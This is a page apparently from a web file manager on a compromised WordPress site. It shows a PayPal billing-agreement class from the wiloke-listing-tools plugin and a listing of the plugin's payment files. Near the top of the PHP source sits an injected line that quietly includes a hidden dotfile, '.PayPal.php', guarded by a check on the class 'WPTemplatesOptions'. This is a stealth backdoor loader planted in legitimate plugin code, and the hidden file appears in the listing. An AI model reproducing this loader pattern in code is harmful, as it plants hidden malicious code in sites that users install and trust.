PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
wiloke-listing-tools
/
app
/
Framework
/
Payment
/
PayPal
<?php namespace WilokeListgoFunctionality\Framework\Payment\PayPal; use PayPal\Api\Agreement; if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class PayPalGetBillingAgreement{ /** * @param string $agreementID * @return object $oAgreement */ public static function get($agreementID){ $instPayPalConfiguration = PayPalConfiguration::setup(); try { $oAgreement = Agreement::get($agreementID, $instPayPalConfiguration->getApiContext()); return $oAgreement; } catch (\Exception $ex) { die($ex->getMessage()); } } }
[+]
..
[-] PayPalRecurringPrepareInvoiceFormat.php
[edit]
[-] PayPalAuthentication.php
[edit]
[-] PayPalRefundNonRecurringPayment.php
[edit]
[-] PayPalSetupAPIContext.php
[edit]
[-] PayPalSuspendPlan.php
[edit]
[-] PayPalValidations.php
[edit]
[-] PayPalGetSubscriptionStatus.php
[edit]
[-] PayPalExecuteRecurringPayment.php
[edit]
[-] PayPalProceededRecurringPaymentHook.php
[edit]
[-] Webhook.php
[edit]
[-] PayPalRecurringCreatedPaymentHook.php
[edit]
[-] PayPalExecuteInterface.php
[edit]
[-] PayPalRecurringPaymentMethod.php
[edit]
[-] PayPalReactivePlan.php
[edit]
[-] PayPalNonRecurringPaymentMethod.php
[edit]
[-] PayPalChangePlan.php
[edit]
[-] PayPalExecutePromotionPayment.php
[edit]
[-] PayPalWebhook.php
[edit]
[-] PayPalGetBillingAgreement.php
[edit]
[-] PaypalUpdateBillingAgreement.php
[edit]
[-] PayPalNonRecurringCreatedPaymentHook.php
[edit]
[-] PayPalGenerateUrls.php
[edit]
[-] cert_key.pem
[edit]
[-] PayPalHelps.php
[edit]
[-] PayPalExecuteNonRecurringPayment.php
[edit]
[-] PayPalConfiguration.php
[edit]
[-] PayPalCancelPlan.php
[edit]
[-] PayPalNonRecurringPrepareInvoiceFormat.php
[edit]
[-] ConvertPayPalStatusToWilokeStatus.php
[edit]
[-] PayPalExecutePaymentAbstract.php
[edit]
[-] PayPalCancelRecurringPayment.php
[edit]
[-] ChangePlan.php
[edit]
[-] RemainingItemsInNonRecurringPayPal.php
[edit]
[-] .PayPal.php
[edit]
[-] PayPalProceededNonRecurringPaymentHook.php
[edit]